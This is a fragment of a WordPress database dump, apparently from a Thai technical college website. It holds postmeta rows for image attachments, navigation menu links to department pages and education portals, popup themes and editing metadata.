(2825, 831, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:698;s:6:\"height\";i:146;s:4:\"file\";s:30:\"2018/01/29-1-2561-15-58-38.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"29-1-2561-15-58-38-150x146.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:146;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"29-1-2561-15-58-38-300x63.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:63;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"29-1-2561-15-58-38-400x84.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2826, 832, '_wp_attached_file', '2018/01/29-1-2561-15-58-49.jpg'),
(2827, 832, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:701;s:6:\"height\";i:116;s:4:\"file\";s:30:\"2018/01/29-1-2561-15-58-49.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"29-1-2561-15-58-49-150x116.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"29-1-2561-15-58-49-300x50.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"29-1-2561-15-58-49-400x66.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:66;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2828, 833, '_wp_attached_file', '2018/01/29-1-2561-15-59-16.jpg'),
(2829, 833, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:729;s:6:\"height\";i:123;s:4:\"file\";s:30:\"2018/01/29-1-2561-15-59-16.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"29-1-2561-15-59-16-150x123.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"29-1-2561-15-59-16-300x51.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:51;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"29-1-2561-15-59-16-400x67.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:67;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2830, 834, '_wp_attached_file', '2018/01/29-1-2561-15-59-28.jpg'),
(2831, 834, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:424;s:6:\"height\";i:104;s:4:\"file\";s:30:\"2018/01/29-1-2561-15-59-28.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"29-1-2561-15-59-28-150x104.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:104;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"29-1-2561-15-59-28-300x74.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:74;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"29-1-2561-15-59-28-400x98.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:98;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2832, 835, '_wp_attached_file', '2018/01/29-1-2561-15-59-38.jpg'),
(2833, 835, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:422;s:6:\"height\";i:89;s:4:\"file\";s:30:\"2018/01/29-1-2561-15-59-38.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"29-1-2561-15-59-38-150x89.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:89;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"29-1-2561-15-59-38-300x63.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:63;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"29-1-2561-15-59-38-400x84.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2843, 848, '_menu_item_type', 'custom'),
(2844, 848, '_menu_item_menu_item_parent', '0'),
(2845, 848, '_menu_item_object_id', '848'),
(2846, 848, '_menu_item_object', 'custom'),
(2847, 848, '_menu_item_target', ''),
(2848, 848, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2849, 848, '_menu_item_xfn', ''),
(2850, 848, '_menu_item_url', '#'),
(2852, 849, '_menu_item_type', 'custom'),
(2853, 849, '_menu_item_menu_item_parent', '848'),
(2854, 849, '_menu_item_object_id', '849'),
(2855, 849, '_menu_item_object', 'custom'),
(2856, 849, '_menu_item_target', ''),
(2857, 849, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2858, 849, '_menu_item_xfn', ''),
(2859, 849, '_menu_item_url', 'http://rms.technicrayong.ac.th/?p=login'),
(2861, 850, '_menu_item_type', 'custom'),
(2862, 850, '_menu_item_menu_item_parent', '848'),
(2863, 850, '_menu_item_object_id', '850'),
(2864, 850, '_menu_item_object', 'custom'),
(2865, 850, '_menu_item_target', ''),
(2866, 850, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2867, 850, '_menu_item_xfn', ''),
(2868, 850, '_menu_item_url', 'http://www.v-cop.go.th/v-cop/'),
(2870, 851, '_menu_item_type', 'custom'),
(2871, 851, '_menu_item_menu_item_parent', '848'),
(2872, 851, '_menu_item_object_id', '851'),
(2873, 851, '_menu_item_object', 'custom'),
(2874, 851, '_menu_item_target', ''),
(2875, 851, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2876, 851, '_menu_item_xfn', ''),
(2877, 851, '_menu_item_url', '/rtc-r-radio-network/?preview_id=3617&preview_nonce=f84ad412ef&_thumbnail_id=-1&preview=true'),
(2879, 852, '_menu_item_type', 'custom'),
(2880, 852, '_menu_item_menu_item_parent', '848'),
(2881, 852, '_menu_item_object_id', '852'),
(2882, 852, '_menu_item_object', 'custom'),
(2883, 852, '_menu_item_target', ''),
(2884, 852, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2885, 852, '_menu_item_xfn', ''),
(2886, 852, '_menu_item_url', 'http://www.student.co.th/'),
(2888, 848, '_publicize_pending', '1'),
(2889, 849, '_publicize_pending', '1'),
(2890, 850, '_publicize_pending', '1'),
(2891, 851, '_publicize_pending', '1'),
(2892, 852, '_publicize_pending', '1'),
(2913, 857, '_menu_item_type', 'custom'),
(2914, 857, '_menu_item_menu_item_parent', '848'),
(2915, 857, '_menu_item_object_id', '857'),
(2916, 857, '_menu_item_object', 'custom'),
(2917, 857, '_menu_item_target', ''),
(2918, 857, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2919, 857, '_menu_item_xfn', ''),
(2920, 857, '_menu_item_url', 'http://datacenter.vec.go.th/vec_web/login.htm?mode=init'),
(2922, 857, '_publicize_pending', '1'),
(2923, 858, '_menu_item_type', 'custom'),
(2924, 858, '_menu_item_menu_item_parent', '0'),
(2925, 858, '_menu_item_object_id', '858'),
(2926, 858, '_menu_item_object', 'custom'),
(2927, 858, '_menu_item_target', ''),
(2928, 858, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2929, 858, '_menu_item_xfn', ''),
(2930, 858, '_menu_item_url', '#'),
(2932, 859, '_menu_item_type', 'custom'),
(2933, 859, '_menu_item_menu_item_parent', '0'),
(2934, 859, '_menu_item_object_id', '859'),
(2935, 859, '_menu_item_object', 'custom'),
(2936, 859, '_menu_item_target', ''),
(2937, 859, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2938, 859, '_menu_item_xfn', ''),
(2939, 859, '_menu_item_url', '#'),
(2941, 858, '_publicize_pending', '1'),
(2942, 859, '_publicize_pending', '1'),
(2943, 860, '_menu_item_type', 'custom'),
(2944, 860, '_menu_item_menu_item_parent', '1115'),
(2945, 860, '_menu_item_object_id', '860'),
(2946, 860, '_menu_item_object', 'custom'),
(2947, 860, '_menu_item_target', ''),
(2948, 860, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2949, 860, '_menu_item_xfn', ''),
(2950, 860, '_menu_item_url', '/ช่างยนต์'),
(2952, 861, '_menu_item_type', 'custom'),
(2953, 861, '_menu_item_menu_item_parent', '1115'),
(2954, 861, '_menu_item_object_id', '861'),
(2955, 861, '_menu_item_object', 'custom'),
(2956, 861, '_menu_item_target', ''),
(2957, 861, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2958, 861, '_menu_item_xfn', ''),
(2959, 861, '_menu_item_url', '/ช่างกล'),
(2961, 862, '_menu_item_type', 'custom'),
(2962, 862, '_menu_item_menu_item_parent', '1115'),
(2963, 862, '_menu_item_object_id', '862'),
(2964, 862, '_menu_item_object', 'custom'),
(2965, 862, '_menu_item_target', ''),
(2966, 862, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2967, 862, '_menu_item_xfn', ''),
(2968, 862, '_menu_item_url', '/ช่างเชื่อม'),
(2970, 863, '_menu_item_type', 'custom'),
(2971, 863, '_menu_item_menu_item_parent', '1115'),
(2972, 863, '_menu_item_object_id', '863'),
(2973, 863, '_menu_item_object', 'custom'),
(2974, 863, '_menu_item_target', ''),
(2975, 863, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2976, 863, '_menu_item_xfn', ''),
(2977, 863, '_menu_item_url', '/ช่างไฟฟ้า'),
(2979, 864, '_menu_item_type', 'custom'),
(2980, 864, '_menu_item_menu_item_parent', '1115'),
(2981, 864, '_menu_item_object_id', '864'),
(2982, 864, '_menu_item_object', 'custom'),
(2983, 864, '_menu_item_target', ''),
(2984, 864, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2985, 864, '_menu_item_xfn', ''),
(2986, 864, '_menu_item_url', '/ช่างอิเล็กทรอนิกส์'),
(2988, 865, '_menu_item_type', 'custom'),
(2989, 865, '_menu_item_menu_item_parent', '1115'),
(2990, 865, '_menu_item_object_id', '865'),
(2991, 865, '_menu_item_object', 'custom'),
(2992, 865, '_menu_item_target', ''),
(2993, 865, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2994, 865, '_menu_item_xfn', ''),
(2995, 865, '_menu_item_url', '/ช่างก่อสร้าง'),
(3033, 870, '_menu_item_type', 'custom'),
(3034, 870, '_menu_item_menu_item_parent', '1116'),
(3035, 870, '_menu_item_object_id', '870'),
(3036, 870, '_menu_item_object', 'custom'),
(3037, 870, '_menu_item_target', ''),
(3038, 870, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3039, 870, '_menu_item_xfn', ''),
(3040, 870, '_menu_item_url', '/การบัญชี'),
(3042, 871, '_menu_item_type', 'custom'),
(3043, 871, '_menu_item_menu_item_parent', '1116'),
(3044, 871, '_menu_item_object_id', '871'),
(3045, 871, '_menu_item_object', 'custom'),
(3046, 871, '_menu_item_target', ''),
(3047, 871, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3048, 871, '_menu_item_xfn', ''),
(3049, 871, '_menu_item_url', '/การตลาด'),
(3051, 872, '_menu_item_type', 'custom'),
(3052, 872, '_menu_item_menu_item_parent', '1116'),
(3053, 872, '_menu_item_object_id', '872'),
(3054, 872, '_menu_item_object', 'custom'),
(3055, 872, '_menu_item_target', ''),
(3056, 872, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3057, 872, '_menu_item_xfn', ''),
(3058, 872, '_menu_item_url', '/การเลขานุการ'),
(3060, 873, '_menu_item_type', 'custom'),
(3061, 873, '_menu_item_menu_item_parent', '1116'),
(3062, 873, '_menu_item_object_id', '873'),
(3063, 873, '_menu_item_object', 'custom'),
(3064, 873, '_menu_item_target', ''),
(3065, 873, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3066, 873, '_menu_item_xfn', ''),
(3067, 873, '_menu_item_url', '/คอมพิวเตอร์ธุรกิจ'),
(3069, 874, '_menu_item_type', 'custom'),
(3070, 874, '_menu_item_menu_item_parent', '1116'),
(3071, 874, '_menu_item_object_id', '874'),
(3072, 874, '_menu_item_object', 'custom'),
(3073, 874, '_menu_item_target', ''),
(3074, 874, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3075, 874, '_menu_item_xfn', ''),
(3076, 874, '_menu_item_url', '/การจัดการโลจิสติกส์'),
(3078, 875, '_menu_item_type', 'custom'),
(3079, 875, '_menu_item_menu_item_parent', '1118'),
(3080, 875, '_menu_item_object_id', '875'),
(3081, 875, '_menu_item_object', 'custom'),
(3082, 875, '_menu_item_target', ''),
(3083, 875, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3084, 875, '_menu_item_xfn', ''),
(3085, 875, '_menu_item_url', '/คหกรรมศาสตร์'),
(3087, 876, '_menu_item_type', 'custom'),
(3088, 876, '_menu_item_menu_item_parent', '1118'),
(3089, 876, '_menu_item_object_id', '876'),
(3090, 876, '_menu_item_object', 'custom'),
(3091, 876, '_menu_item_target', ''),
(3092, 876, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3093, 876, '_menu_item_xfn', ''),
(3094, 876, '_menu_item_url', '#'),
(3105, 878, '_menu_item_type', 'custom'),
(3106, 878, '_menu_item_menu_item_parent', '1119'),
(3107, 878, '_menu_item_object_id', '878'),
(3108, 878, '_menu_item_object', 'custom'),
(3109, 878, '_menu_item_target', ''),
(3110, 878, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3111, 878, '_menu_item_xfn', ''),
(3112, 878, '_menu_item_url', '/การท่องเที่ยว'),
(3114, 879, '_menu_item_type', 'custom'),
(3115, 879, '_menu_item_menu_item_parent', '1119'),
(3116, 879, '_menu_item_object_id', '879'),
(3117, 879, '_menu_item_object', 'custom'),
(3118, 879, '_menu_item_target', ''),
(3119, 879, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3120, 879, '_menu_item_xfn', ''),
(3121, 879, '_menu_item_url', '/การโรงแรม'),
(3132, 860, '_publicize_pending', '1'),
(3133, 861, '_publicize_pending', '1'),
(3134, 862, '_publicize_pending', '1'),
(3135, 863, '_publicize_pending', '1'),
(3136, 864, '_publicize_pending', '1'),
(3137, 865, '_publicize_pending', '1'),
(3142, 870, '_publicize_pending', '1'),
(3143, 871, '_publicize_pending', '1'),
(3144, 872, '_publicize_pending', '1'),
(3145, 873, '_publicize_pending', '1'),
(3146, 874, '_publicize_pending', '1'),
(3147, 875, '_publicize_pending', '1'),
(3148, 876, '_publicize_pending', '1'),
(3150, 878, '_publicize_pending', '1'),
(3151, 879, '_publicize_pending', '1'),
(3189, 898, '_pum_built_in', 'default-theme'),
(3190, 898, '_pum_default_theme', '1'),
(3191, 898, '_publicize_pending', '1'),
(3262, 899, '_pum_built_in', 'lightbox'),
(3263, 899, '_publicize_pending', '1'),
(3269, 900, '_pum_built_in', 'enterprise-blue'),
(3270, 900, '_publicize_pending', '1'),
(3276, 901, '_pum_built_in', 'hello-box'),
(3277, 901, '_publicize_pending', '1'),
(3283, 902, '_pum_built_in', 'cutting-edge'),
(3284, 902, '_publicize_pending', '1'),
(3290, 903, '_pum_built_in', 'framed-border'),
(3291, 903, '_publicize_pending', '1'),
(3306, 898, '_edit_lock', '1629445251:12'),
(3307, 899, '_edit_lock', '1629446538:12'),
(3308, 900, '_edit_lock', '1629446473:12'),
(3309, 898, '_edit_last', '1'),
(3310, 898, '_hide_featured', NULL),
(3317, 898, '_pum_user_modified', '1'),
(3323, 920, '_thumbnail_id', '4257'),
(3324, 920, '_edit_lock', '1541575098:3'),
(3325, 920, '_edit_last', '3'),
(3329, 920, '_hide_featured', NULL),
(3330, 920, '_wpas_done_all', '1'),
(3333, 922, '_thumbnail_id', '4255'),
(3334, 922, '_edit_lock', '1541577215:3'),
(3335, 922, '_edit_last', '3'),
(3339, 922, '_hide_featured', NULL),
(3340, 922, '_wpas_done_all', '1'),
(3341, 924, '_thumbnail_id', '4252'),
(3342, 924, '_edit_lock', '1541561875:3'),
(3343, 924, '_edit_last', '3'),
(3347, 924, '_hide_featured', NULL),
(3348, 924, '_wpas_done_all', '1'),
(3349, 926, '_thumbnail_id', '4249'),
(3350, 926, '_edit_lock', '1541560867:3'),
(3351, 926, '_edit_last', '3'),
(3355, 926, '_hide_featured', NULL),
(3356, 926, '_wpas_done_all', '1'),
(3359, 922, '_jetpack_related_posts_cache', 'a:1:{s:32:\"e9d3f781f9e815d5944bbe7ec1825f4d\";a:2:{s:7:\"expires\";i:1575443945;s:7:\"payload\";a:1:{i:0;a:1:{s:2:\"id\";i:4260;}}}}'),
(3361, 746, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575485344;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4955;}i:1;a:1:{s:2:\"id\";i:4958;}i:2;a:1:{s:2:\"id\";i:4971;}}}}'),
(3362, 740, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575352707;s:7:\"payload\";a:0:{}}}'),
(3363, 744, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574801834;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4830;}i:1;a:1:{s:2:\"id\";i:4964;}i:2;a:1:{s:2:\"id\";i:4826;}}}}'),
(3364, 930, '_edit_lock', '1554282788:12'),
(3365, 930, '_edit_last', '12'),
(3368, 932, '_wp_attached_file', '2018/02/2-2-2561-13-24-27.jpg'),
(3369, 932, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:708;s:6:\"height\";i:530;s:4:\"file\";s:29:\"2018/02/2-2-2561-13-24-27.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-24-27-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-24-27-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-24-27-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3370, 933, '_wp_attached_file', '2018/02/2-2-2561-13-24-50.jpg'),
(3371, 933, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:698;s:6:\"height\";i:527;s:4:\"file\";s:29:\"2018/02/2-2-2561-13-24-50.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-24-50-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-24-50-300x227.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:227;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-24-50-397x300.jpg\";s:5:\"width\";i:397;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3372, 934, '_wp_attached_file', '2018/02/2-2-2561-13-25-19.jpg'),
(3373, 934, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:701;s:6:\"height\";i:531;s:4:\"file\";s:29:\"2018/02/2-2-2561-13-25-19.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-25-19-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-25-19-300x227.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:227;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-25-19-396x300.jpg\";s:5:\"width\";i:396;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3374, 935, '_wp_attached_file', '2018/02/2-2-2561-13-26-02.jpg'),
(3375, 935, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:701;s:6:\"height\";i:534;s:4:\"file\";s:29:\"2018/02/2-2-2561-13-26-02.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-26-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-26-02-300x229.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-26-02-394x300.jpg\";s:5:\"width\";i:394;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3376, 936, '_wp_attached_file', '2018/02/2-2-2561-13-26-25.jpg'),
(3377, 936, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:696;s:6:\"height\";i:531;s:4:\"file\";s:29:\"2018/02/2-2-2561-13-26-25.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-26-25-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-26-25-300x229.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-26-25-393x300.jpg\";s:5:\"width\";i:393;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3378, 937, '_wp_attached_file', '2018/02/2-2-2561-13-27-25.jpg'),
(3379, 937, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:696;s:6:\"height\";i:530;s:4:\"file\";s:29:\"2018/02/2-2-2561-13-27-25.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-27-25-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-27-25-300x228.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:228;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-27-25-394x300.jpg\";s:5:\"width\";i:394;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3380, 938, '_wp_attached_file', '2018/02/2-2-2561-13-27-51.jpg'),
